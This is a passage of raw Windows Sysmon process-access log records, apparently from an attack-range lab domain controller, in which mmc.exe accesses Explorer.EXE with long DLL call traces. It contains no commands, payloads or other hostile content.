ll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777 10341000x8000000000000000286042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68cdc|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777 10341000x8000000000000000286041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68cdc|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158 10341000x8000000000000000286040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68cdc|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68bd5|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777|C:\Windows\System32\mshtml.dll+1176c1 10341000x8000000000000000286038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68bd5|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777|C:\Windows\System32\mshtml.dll+1176c1 10341000x8000000000000000286037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68bd5|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68bd5|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698 10341000x8000000000000000286035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68b9a|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777|C:\Windows\System32\mshtml.dll+1176c1 10341000x8000000000000000286034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68b9a|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777|C:\Windows\System32\mshtml.dll+1176c1 10341000x8000000000000000286033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68b9a|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68b9a|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698 10341000x8000000000000000286031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68b5f|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777|C:\Windows\System32\mshtml.dll+1176c1 10341000x8000000000000000286030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68b5f|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777|C:\Windows\System32\mshtml.dll+1176c1 10341000x8000000000000000286029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68b5f|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68b5f|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698 10341000x8000000000000000286027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+13f566|C:\Windows\System32\ieframe.dll+6847f|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777 10341000x8000000000000000286026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+13f566|C:\Windows\System32\ieframe.dll+6847f|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777 10341000x8000000000000000286025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+13f566|C:\Windows\System32\ieframe.dll+6847f|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158 10341000x8000000000000000286024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+13f566|C:\Windows\System32\ieframe.dll+6847f|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+179fe0|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777|C:\Windows\System32\mshtml.dll+1176c1 10341000x8000000000000000286022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+179fe0|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777|C:\Windows\System32\mshtml.dll+1176c1 10341000x8000000000000000286021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 